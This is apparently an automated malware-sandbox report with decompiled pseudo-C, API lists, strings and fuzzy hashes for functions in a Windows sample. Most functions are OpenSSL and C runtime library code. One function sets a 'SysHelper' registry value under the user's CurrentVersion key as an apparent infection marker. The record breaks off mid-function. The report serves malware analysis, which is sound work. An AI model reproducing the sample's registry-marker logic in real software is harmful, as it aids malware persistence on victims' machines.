_malloc.LIBCMT ref: 0040CE21
_fprintf.LIBCMT ref: 0040CE75

Strings

Error encrypting message: %s, xrefs: 0040CE67
 , xrefs: 0040CCAF
\\n, xrefs: 0040CC1B

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:  $Error encrypting message: %s$\\n
API String ID: 1783060780-3771355929
Opcode ID: 129d320a3357caf3750c3e2dbb4c313d3b55865f10aa39da1050f24d3ddf2667
Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
Opcode Fuzzy Hash: 129d320a3357caf3750c3e2dbb4c313d3b55865f10aa39da1050f24d3ddf2667
Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00463350(void* __ebx, void* __edx, void* __ebp, char _a4, intOrPtr* _a8) {
				void* __edi;
				intOrPtr _t12;
				void* _t13;
				char _t16;
				intOrPtr _t19;
				signed int _t22;
				char _t35;
				void* _t36;
				char* _t37;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t40;
				char* _t41;
				void* _t42;
				char* _t43;

				_t45 = __ebp;
				_t38 = __edx;
				_t34 = __ebx;
				_t40 = _a4;
				_t39 = _a8;
				 *_t39 = 0;
				if(_t40 == 0) {
					L26:
					return 1;
				} else {
					_t12 =  *_t40;
					if(_t12 == 0 || _t12 == 0xa) {
						goto L26;
					} else {
						_t13 = E00448190(_t40, "Proc-Type: ", 0xb);
						_t60 = _t13;
						if(_t13 == 0) {
							__eflags =  *((char*)(_t40 + 0xb)) - 0x34;
							if( *((char*)(_t40 + 0xb)) != 0x34) {
								goto L5;
							} else {
								__eflags =  *((char*)(_t40 + 0xc)) - 0x2c;
								if( *((char*)(_t40 + 0xc)) != 0x2c) {
									goto L5;
								} else {
									_t41 = _t40 + 0xd;
									__eflags = E00448190(_t41, "ENCRYPTED", 9);
									if(__eflags == 0) {
										_t16 =  *_t41;
										__eflags = _t16 - 0xa;
										if(_t16 == 0xa) {
											L13:
											__eflags =  *_t41;
											if(__eflags != 0) {
												_t42 = _t41 + 1;
												__eflags = E00448190(_t42, "DEK-Info: ", 0xa);
												if(__eflags == 0) {
													_t43 = _t42 + 0xa;
													__eflags = _t43;
													_t37 = _t43;
													_push(_t34);
													while(1) {
														_t35 =  *_t43;
														__eflags = _t35 - 0x41;
														if(_t35 < 0x41) {
															goto L20;
														}
														__eflags = _t35 - 0x5a;
														if(_t35 <= 0x5a) {
															L22:
															_t43 = _t43 + 1;
															continue;
														}
														L20:
														__eflags = _t35 - 0x2d;
														if(_t35 == 0x2d) {
															goto L22;
														}
														_t6 = _t35 - 0x30; // -48
														__eflags = _t6 - 9;
														if(_t6 <= 9) {
															goto L22;
														}
														 *_t43 = 0;
														_t19 = E0047ECD0(_t37);
														 *_t39 = _t19;
														 *_t43 = _t35;
														_a4 = _t43 + 1;
														_pop(_t36);
														__eflags = _t19;
														if(__eflags != 0) {
															_t22 = E00464360( &_a4, _t39 + 4,  *((intOrPtr*)(_t19 + 0xc)));
															asm("sbb eax, eax");
															return  ~( ~_t22);
														} else {
															E004512D0(_t36, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x72, ".\\crypto\\pem\\pem_lib.c", 0x219);
															__eflags = 0;
															return 0;
														}
														goto L27;
													}
												} else {
													E004512D0(_t34, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x69, ".\\crypto\\pem\\pem_lib.c", 0x200);
													__eflags = 0;
													return 0;
												}
											} else {
												goto L14;
											}
										} else {
											while(1) {
												__eflags = _t16;
												if(__eflags == 0) {
													break;
												}
												_t16 =  *((intOrPtr*)(_t41 + 1));
												_t41 = _t41 + 1;
												__eflags = _t16 - 0xa;
												if(_t16 != 0xa) {
													continue;
												} else {
													goto L13;
												}
												goto L27;
											}
											L14:
											E004512D0(_t34, _t38, _t39, _t45, __eflags, 9, 0x6b, 0x70, ".\\crypto\\pem\\pem_lib.c", 0x1fd);
											__eflags = 0;
											return 0;
										}
									} else {
										E004512D0(__ebx, _t38, _t39, __ebp, __eflags, 9, 0x6b, 0x6a, ".\\crypto\\pem\\pem_lib.c", 0x1f9);
										__eflags = 0;
										return 0;
									}
								}
							}
						} else {
							E004512D0(__ebx, _t38, _t39, __ebp, _t60, 9, 0x6b, 0x6b, ".\\crypto\\pem\\pem_lib.c", 0x1f4);
							L5:
							return 0;
						}
					}
				}
				L27:
			}

0x00463350
0x00463350
0x00463350
0x00463351
0x00463356
0x0046335a
0x00463362
0x004634c7
0x004634cd
0x00463368
0x00463368
0x0046336c
0x00000000
0x0046337a
0x00463382
0x0046338a
0x0046338c
0x004633ab
0x004633af
0x00000000
0x004633b1
0x004633b1
0x004633b5
0x00000000
0x004633b7
0x004633b9
0x004633ca
0x004633cc
0x004633eb
0x004633ed
0x004633ef
0x004633fd
0x004633fd
0x00463400
0x00463421
0x00463430
0x00463432
0x00463451
0x00463451
0x00463454
0x00463456
0x00463457
0x00463457
0x00463459
0x0046345c
0x00000000
0x00000000
0x0046345e
0x00463461
0x0046346f
0x0046346f
0x00000000
0x0046346f
0x00463463
0x00463463
0x00463466
0x00000000
0x00000000
0x00463468
0x0046346b
0x0046346d
0x00000000
0x00000000
0x00463473
0x00463476
0x0046347e
0x00463480
0x00463483
0x00463487
0x00463488
0x0046348a
0x004634b5
0x004634bf
0x004634c5
0x0046348c
0x0046349c
0x004634a4
0x004634a8
0x004634a8
0x00000000
0x0046348a
0x00463434
0x00463444
0x0046344c
0x00463450
0x00463450
0x00000000
0x00000000
0x00000000
0x004633f1
0x004633f1
0x004633f1
0x004633f3
0x00000000
0x00000000
0x004633f5
0x004633f8
0x004633f9
0x004633fb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004633fb
0x00463402
0x00463412
0x0046341a
0x0046341e
0x0046341e
0x004633ce
0x004633de
0x004633e6
0x004633ea
0x004633ea
0x004633cc
0x004633b5
0x0046338e
0x0046339e
0x004633a7
0x004633aa
0x004633aa
0x0046338c
0x0046336c
0x00000000

APIs

_strncmp.LIBCMT ref: 00463382
_strncmp.LIBCMT ref: 004633C2

Strings

Proc-Type: , xrefs: 0046337C
DEK-Info: , xrefs: 00463422
.\crypto\pem\pem_lib.c, xrefs: 00463393, 004633D3, 00463407, 00463439, 00463491
ENCRYPTED, xrefs: 004633BC

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
API String ID: 909875538-2908105608
Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F

Uniqueness

Uniqueness Score: -1.00%

Function 004C5D39 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004C5D39(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v32;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				signed int _t32;
				signed int* _t34;
				signed int _t36;
				signed int _t42;
				signed int _t47;
				char* _t48;
				signed int _t49;
				signed int _t52;
				unsigned int _t58;
				signed int _t59;
				signed int _t60;
				void* _t63;
				signed int _t66;
				signed int _t73;
				void* _t78;
				char* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t83;
				void* _t89;
				void* _t93;

				_t63 = __edx;
				_t89 = _t93;
				_t78 = E0042501F(__ebx);
				if(_t78 != 0) {
					_push(__ebx);
					__eflags =  *(_t78 + 0x24);
					if( *(_t78 + 0x24) != 0) {
						L7:
						_t79 =  *(_t78 + 0x24);
						_t32 = E0042C0FD(_t79, 0x86, E004C5D13(_a4));
						__eflags = _t32;
						if(_t32 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E004242FD(0x86, _t63);
							asm("int3");
							_push(_t89);
							__eflags = _v32;
							_push(_t79);
							if(__eflags != 0) {
								_t80 = _v16;
								__eflags = _t80;
								if(__eflags == 0) {
									goto L10;
								} else {
									_t7 = _t80 - 1; // -1
									_t36 = E0043FF8E(_v20, _t80, E004C5D13(_v12), _t7);
									__eflags = _t36;
									if(_t36 == 0) {
										goto L11;
									} else {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E004242FD(0x86, _t63);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t58 = _v52;
										_push(0);
										__eflags = _t58;
										if(_t58 == 0) {
											L34:
											return _v60;
										} else {
											_push(_t80);
											_push(0x86);
											_t52 = _t58;
											_t83 = _v56;
											__eflags = _t83 & 0x00000003;
											_t73 = _v60;
											if((_t83 & 0x00000003) != 0) {
												while(1) {
													_t42 =  *_t83;
													_t83 = _t83 + 1;
													 *_t73 = _t42;
													_t73 = _t73 + 1;
													_t58 = _t58 - 1;
													__eflags = _t58;
													if(_t58 == 0) {
														goto L26;
													}
													__eflags = _t42;
													if(_t42 == 0) {
														__eflags = _t73 & 0x00000003;
														if((_t73 & 0x00000003) == 0) {
															L30:
															_t52 = _t58;
															_t59 = _t58 >> 2;
															__eflags = _t59;
															if(_t59 != 0) {
																goto L46;
															} else {
																goto L31;
															}
														} else {
															while(1) {
																 *_t73 = _t42;
																_t73 = _t73 + 1;
																_t58 = _t58 - 1;
																__eflags = _t58;
																if(_t58 == 0) {
																	goto L49;
																}
																__eflags = _t73 & 0x00000003;
																if((_t73 & 0x00000003) != 0) {
																	continue;
																} else {
																	goto L30;
																}
																goto L50;
															}
															goto L49;
														}
													} else {
														__eflags = _t83 & 0x00000003;
														if((_t83 & 0x00000003) != 0) {
															continue;
														} else {
															_t52 = _t58;
															_t60 = _t58 >> 2;
															__eflags = _t60;
															if(_t60 != 0) {
																goto L36;
															} else {
																goto L23;
															}
														}
													}
													goto L50;
												}
												goto L26;
											} else {
												_t60 = _t58 >> 2;
												__eflags = _t60;
												if(_t60 != 0) {
													do {
														L36:
														_t47 =  *_t83 ^ 0xffffffff ^ 0x7efefeff +  *_t83;
														_t66 =  *_t83;
														_t83 = _t83 + 4;
														__eflags = _t47 & 0x81010100;
														if((_t47 & 0x81010100) == 0) {
															goto L35;
														} else {
															__eflags = _t66;
															if(_t66 == 0) {
																__eflags = 0;
																 *_t73 = 0;
																goto L45;
															} else {
																__eflags = _t66;
																if(_t66 == 0) {
																	 *_t73 = _t66 & 0x000000ff;
																	goto L45;
																} else {
																	__eflags = _t66 & 0x00ff0000;
																	if((_t66 & 0x00ff0000) == 0) {
																		 *_t73 = _t66 & 0x0000ffff;
																		goto L45;
																	} else {
																		__eflags = _t66 & 0xff000000;
																		if((_t66 & 0xff000000) != 0) {
																			goto L35;
																		} else {
																			 *_t73 = _t66;
																			L45:
																			_t73 = _t73 + 4;
																			_t42 = 0;
																			_t59 = _t60 - 1;
																			__eflags = _t59;
																			if(_t59 != 0) {
																				L46:
																				_t42 = 0;
																				__eflags = 0;
																				do {
																					 *_t73 = 0;
																					_t73 = _t73 + 4;
																					_t59 = _t59 - 1;
																					__eflags = _t59;
																				} while (_t59 != 0);
																			}
																			_t52 = _t52 & 0x00000003;
																			__eflags = _t52;
																			if(_t52 != 0) {
																				goto L31;
																			} else {
																				L49:
																				return _v60;
																			}
																		}
																	}
																}
															}
														}
														goto L50;
														L35:
														 *_t73 = _t66;
														_t73 = _t73 + 4;
														_t60 = _t60 - 1;
														__eflags = _t60;
													} while (_t60 != 0);
													L23:
													_t52 = _t52 & 0x00000003;
													__eflags = _t52;
													if(_t52 == 0) {
														goto L26;
													} else {
														goto L24;
													}
												} else {
													while(1) {
														L24:
														_t42 =  *_t83;
														_t83 = _t83 + 1;
														 *_t73 = _t42;
														_t73 = _t73 + 1;
														__eflags = _t42;
														if(_t42 == 0) {
															break;
														}
														_t52 = _t52 - 1;
														__eflags = _t52;
														if(_t52 != 0) {
															continue;
														} else {
															L26:
															return _v60;
														}
														goto L50;
													}
													L32:
													_t52 = _t52 - 1;
													__eflags = _t52;
													if(_t52 != 0) {
														L31:
														 *_t73 = _t42;
														_t73 = _t73 + 1;
														__eflags = _t73;
														goto L32;
													}
													goto L34;
												}
											}
										}
									}
								}
							} else {
								L10:
								_t34 = E00425208(__eflags);
								_t81 = 0x16;
								 *_t34 = _t81;
								E004242D2();
								_t36 = _t81;
								L11:
								return _t36;
							}
						} else {
							_t48 = _t79;
							goto L5;
						}
					} else {
						_t49 = E00428C96(0x86, 1);
						 *(_t78 + 0x24) = _t49;
						__eflags = _t49;
						if(_t49 != 0) {
							goto L7;
						} else {
							_t48 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
							L5:
							goto L6;
						}
					}
				} else {
					_t48 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
					L6:
					return _t48;
				}
				L50:
			}

0x004c5d39
0x004c5d3a
0x004c5d42
0x004c5d46
0x004c5d4f
0x004c5d58
0x004c5d5b
0x004c5d78
0x004c5d7b
0x004c5d86
0x004c5d8e
0x004c5d90
0x004c5d96
0x004c5d97
0x004c5d98
0x004c5d99
0x004c5d9a
0x004c5d9b
0x004c5da0
0x004c5da1
0x004c5da4
0x004c5da8
0x004c5da9
0x004c5dbf
0x004c5dc2
0x004c5dc4
0x00000000
0x004c5dc6
0x004c5dc6
0x004c5dd8
0x004c5de0
0x004c5de2
0x00000000
0x004c5de4
0x004c5de6
0x004c5de7
0x004c5de8
0x004c5de9
0x004c5dea
0x004c5deb
0x004c5df0
0x004c5df1
0x004c5df2
0x004c5df3
0x004c5df4
0x004c5df5
0x004c5df6
0x004c5df7
0x004c5df8
0x004c5df9
0x004c5dfa
0x004c5dfb
0x004c5dfc
0x004c5dfd
0x004c5dfe
0x004c5dff
0x004c5e00
0x004c5e04
0x004c5e05
0x004c5e07
0x004c5e9f
0x004c5ea4
0x004c5e0d
0x004c5e0d
0x004c5e0e
0x004c5e0f
0x004c5e11
0x004c5e15
0x004c5e1b
0x004c5e1f
0x004c5e2c
0x004c5e2c
0x004c5e2e
0x004c5e31
0x004c5e33
0x004c5e36
0x004c5e36
0x004c5e39
0x00000000
0x00000000
0x004c5e3b
0x004c5e3d
0x004c5e6e
0x004c5e74
0x004c5e8c
0x004c5e8c
0x004c5e8e
0x004c5e8e
0x004c5e91
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e76
0x004c5e76
0x004c5e76
0x004c5e78
0x004c5e7b
0x004c5e7b
0x004c5e7e
0x00000000
0x00000000
0x004c5e84
0x004c5e8a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e8a
0x00000000
0x004c5e76
0x004c5e3f
0x004c5e3f
0x004c5e45
0x00000000
0x004c5e47
0x004c5e47
0x004c5e49
0x004c5e49
0x004c5e4c
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e4c
0x004c5e45
0x00000000
0x004c5e3d
0x00000000
0x004c5e21
0x004c5e21
0x004c5e21
0x004c5e24
0x004c5eaf
0x004c5eaf
0x004c5ebb
0x004c5ebd
0x004c5ebf
0x004c5ec2
0x004c5ec7
0x00000000
0x004c5ec9
0x004c5ec9
0x004c5ecb
0x004c5ef9
0x004c5efb
0x00000000
0x004c5ecd
0x004c5ecd
0x004c5ecf
0x004c5ef5
0x00000000
0x004c5ed1
0x004c5ed1
0x004c5ed7
0x004c5eeb
0x00000000
0x004c5ed9
0x004c5ed9
0x004c5edf
0x00000000
0x004c5ee1
0x004c5ee1
0x004c5efd
0x004c5efd
0x004c5f00
0x004c5f02
0x004c5f02
0x004c5f05
0x004c5f07
0x004c5f07
0x004c5f07
0x004c5f09
0x004c5f09
0x004c5f0b
0x004c5f0e
0x004c5f0e
0x004c5f0e
0x004c5f09
0x004c5f13
0x004c5f13
0x004c5f16
0x00000000
0x004c5f1c
0x004c5f1c
0x004c5f23
0x004c5f23
0x004c5f16
0x004c5edf
0x004c5ed7
0x004c5ecf
0x004c5ecb
0x00000000
0x004c5ea5
0x004c5ea5
0x004c5ea7
0x004c5eaa
0x004c5eaa
0x004c5eaa
0x004c5e4e
0x004c5e4e
0x004c5e4e
0x004c5e51
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e2a
0x004c5e53
0x004c5e53
0x004c5e53
0x004c5e55
0x004c5e58
0x004c5e5a
0x004c5e5d
0x004c5e5f
0x00000000
0x00000000
0x004c5e61
0x004c5e61
0x004c5e64
0x00000000
0x004c5e66
0x004c5e66
0x004c5e6d
0x004c5e6d
0x00000000
0x004c5e64
0x004c5e98
0x004c5e98
0x004c5e98
0x004c5e9b
0x004c5e93
0x004c5e93
0x004c5e95
0x004c5e95
0x00000000
0x004c5e95
0x00000000
0x004c5e9e
0x004c5e24
0x004c5e1f
0x004c5e07
0x004c5de2
0x004c5dab
0x004c5dab
0x004c5dab
0x004c5db2
0x004c5db3
0x004c5db5
0x004c5dba
0x004c5dbc
0x004c5dbe
0x004c5dbe
0x004c5d92
0x004c5d92
0x00000000
0x004c5d92
0x004c5d5d
0x004c5d60
0x004c5d65
0x004c5d6a
0x004c5d6c
0x00000000
0x004c5d6e
0x004c5d6e
0x004c5d73
0x00000000
0x004c5d74
0x004c5d6c
0x004c5d48
0x004c5d48
0x004c5d75
0x004c5d77
0x004c5d77
0x00000000

APIs

__getptd_noexit.LIBCMT ref: 004C5D3D

Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083

__calloc_crt.LIBCMT ref: 004C5D60
__get_sys_err_msg.LIBCMT ref: 004C5D7E
__invoke_watson.LIBCMT ref: 004C5D9B
__get_sys_err_msg.LIBCMT ref: 004C5DCD
__invoke_watson.LIBCMT ref: 004C5DEB

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: ErrorLast__calloc_crt__get_sys_err_msg__invoke_watson$CurrentThread__getptd_noexit__initptd
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 2139067377-798102604
Opcode ID: 6565f3eeb2dc9c0597fd8b1228d76a5755e5e4a7eea90c3f78218ec856ed93f0
Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
Opcode Fuzzy Hash: 6565f3eeb2dc9c0597fd8b1228d76a5755e5e4a7eea90c3f78218ec856ed93f0
Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C6A0() {
				void* _v8;
				char _v12;
				int _v16;
				int _v20;
				char _t16;

				_v8 = 0;
				_t16 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion", 0, 0xf003f,  &_v8);
				if(_t16 != 0) {
					L4:
					return 1;
				} else {
					_v12 = _t16;
					_v20 = 4;
					_v16 = 4;
					if(RegQueryValueExW(_v8, L"SysHelper", 0,  &_v20,  &_v12,  &_v16) != 0) {
						_v12 = 1;
						RegSetValueExW(_v8, L"SysHelper", 0, 4,  &_v12, 4);
						RegCloseKey(_v8);
						goto L4;
					} else {
						RegCloseKey(_v8);
						return 0;
					}
				}
			}

0x0040c6a9
0x0040c6c2
0x0040c6ca
0x0040c734
0x0040c739
0x0040c6cc
0x0040c6cc
0x0040c6d6
0x0040c6e1
0x0040c6fb
0x0040c711
0x0040c725
0x0040c72e
0x00000000
0x0040c6fd
0x0040c700
0x0040c70b
0x0040c70b
0x0040c6fb

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
RegCloseKey.ADVAPI32(00000000), ref: 0040C700
RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
RegCloseKey.ADVAPI32(00000000), ref: 0040C72E

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040C6B8
SysHelper, xrefs: 0040C6EB, 0040C71D

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CloseValue$OpenQuery
String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
API String ID: 3962714758-1667468722
Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58

Uniqueness

Uniqueness Score: -1.00%

Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E004573F0(signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, char _a28, signed int _a60, intOrPtr _a68, char _a72, signed int _a76, signed int _a80, signed int _a84, signed int _a88, intOrPtr _a92, signed int _a96, intOrPtr _a100, signed char _a104) {
				signed int _v0;
				signed int _v4;
				intOrPtr _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t129;
				intOrPtr _t135;
				signed int _t136;
				signed int _t140;
				void* _t141;
				signed int _t143;
				signed int _t148;
				void* _t150;
				intOrPtr _t154;
				signed char _t160;
				char _t166;
				intOrPtr _t170;
				signed int _t174;
				signed int _t181;
				signed int* _t182;
				intOrPtr _t184;
				intOrPtr _t185;
				void* _t186;
				intOrPtr _t187;
				signed char _t189;
				signed int _t192;
				signed int* _t196;
				signed int _t199;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				void* _t208;
				intOrPtr _t209;
				signed int _t213;
				intOrPtr _t214;
				intOrPtr* _t217;
				signed int _t220;
				signed int _t221;
				void* _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t231;
				intOrPtr* _t232;
				signed int* _t233;
				void* _t235;
				signed int _t240;
				void* _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr _t249;
				intOrPtr _t250;
				signed int _t253;
				signed int _t257;
				void* _t262;
				signed char _t268;

				E0042F7C0(0x40);
				_t129 =  *0x50ad20; // 0xcafe2c1d
				_a60 = _t129 ^ _t253;
				_t187 = _a100;
				_t181 = _a84;
				_t249 = _a68;
				_a28 = _a72;
				_a8 = _a76;
				_v0 = _a80;
				_t220 = 0;
				_a4 = 0x4ffca4;
				_a12 = 0;
				_t188 =  <  ? 0 : _t187;
				_t213 = _a88;
				_a100 =  <  ? 0 : _t187;
				_t189 = _a104;
				if((_t189 & 0x00000040) == 0) {
					_t257 = _t213;
					if(_t257 > 0 || _t257 >= 0 && _t181 >= 0) {
						__eflags = _t189 & 0x00000002;
						if((_t189 & 0x00000002) == 0) {
							__eflags = _t189 & 0x00000004;
							_a16 = 0x20;
							_t179 =  !=  ? _a16 : 0;
							_a12 =  !=  ? _a16 : 0;
						} else {
							_a12 = 0x2b;
						}
					} else {
						_t181 =  ~_t181;
						_a12 = 0x2d;
						asm("adc edx, eax");
						_t213 =  ~_t213;
					}
				}
				_t135 = _a92;
				if((_t189 & 0x00000008) != 0) {
					if(_t135 != 8) {
						__eflags = _a92 - 0x10;
						_t178 =  !=  ? 0x4ffca4 : "0x";
						_a4 =  !=  ? 0x4ffca4 : "0x";
						_t135 = _a92;
					} else {
						_a4 = "0";
					}
				}
				_a16 = "0123456789abcdef";
				_t230 =  !=  ? 1 : _t220;
				_t262 =  !=  ? 1 : _t220;
				_t192 =  ==  ? _a16 : "0123456789ABCDEF";
				_t231 = _t192;
				while(1) {
					_t136 = E0043AE20(_t181, _t213, _t135, 0);
					_a4 = _t181;
					_t181 = _t136;
					 *((char*)(_t253 + _t220 + 0x30)) =  *((intOrPtr*)(_t192 + _t231));
					_t220 = _t220 + 1;
					_t192 = _t181 | _t213;
					if(_t192 == 0) {
						break;
					}
					_t135 = _a92;
					if(_t220 < 0x1a) {
						continue;
					}
					break;
				}
				_t232 = _a4;
				_a16 = _t220;
				if(_t220 != 0x1a) {
					if(__eflags >= 0) {
						E0042AC83();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						E0042F7C0(4);
						_t140 = _a8;
						_t214 = 0;
						__eflags = _t140;
						_v16 = 0;
						_t196 =  !=  ? _t140 : "<NULL>";
						_t141 = 0;
						_a8 = _t196;
						__eflags =  *_t196;
						if( *_t196 != 0) {
							do {
								_t141 = _t141 + 1;
								__eflags =  *(_t141 + _t196);
							} while ( *(_t141 + _t196) != 0);
						}
						_t199 =  <  ? _t214 : _a16 - _t141;
						__eflags = _a12 & 0x00000001;
						_a16 = _t199;
						if((_a12 & 0x00000001) != 0) {
							_t199 =  ~_t199;
							_a16 = _t199;
						}
						_push(_t181);
						_t182 = _v0;
						_push(_t249);
						_t250 = _v8;
						_push(_t232);
						_t233 = _a4;
						_push(_t220);
						_t221 = _v4;
						__eflags = _t199;
						if(_t199 > 0) {
							while(1) {
								__eflags = _t214 - _a20;
								if(_t214 >= _a20) {
									goto L71;
								}
								__eflags = _t221;
								if(_t221 != 0) {
									__eflags =  *_t182 -  *_t233;
									if( *_t182 >=  *_t233) {
										do {
											__eflags =  *_t221;
											if( *_t221 != 0) {
												 *_t233 =  *_t233 + 0x400;
												__eflags =  *_t233;
												_t150 = E00454F30( *_t221,  *_t233, ".\\crypto\\bio\\b_print.c", 0x2ed);
												_t253 = _t253 + 0x10;
												 *_t221 = _t150;
											} else {
												__eflags =  *_t233;
												if( *_t233 == 0) {
													 *_t233 = 0x400;
												}
												 *_t221 = E00454E50( *_t233, ".\\crypto\\bio\\b_print.c", 0x2e5);
												_t253 = _t253 + 0xc;
												_t206 =  *_t182;
												__eflags = _t206;
												if(_t206 != 0) {
													E0042D8D0(_t152, _v0, _t206);
													_t253 = _t253 + 0xc;
												}
												_v0 = 0;
											}
											__eflags =  *_t182 -  *_t233;
										} while ( *_t182 >=  *_t233);
										_t214 = _v16;
									}
								}
								_t203 =  *_t182;
								__eflags = _t203 -  *_t233;
								if(_t203 <  *_t233) {
									_t148 = _v0;
									__eflags = _t148;
									if(_t148 == 0) {
										 *((char*)(_t203 +  *_t221)) = 0x20;
									} else {
										 *((char*)(_t148 + _t203)) = 0x20;
									}
									 *_t182 =  *_t182 + 1;
									__eflags =  *_t182;
								}
								_t214 = _t214 + 1;
								_t205 = _a16 - 1;
								_v16 = _t214;
								_a16 = _t205;
								__eflags = _t205;
								if(_t205 > 0) {
									continue;
								}
								goto L71;
							}
						}
						L71:
						_t200 = _a8;
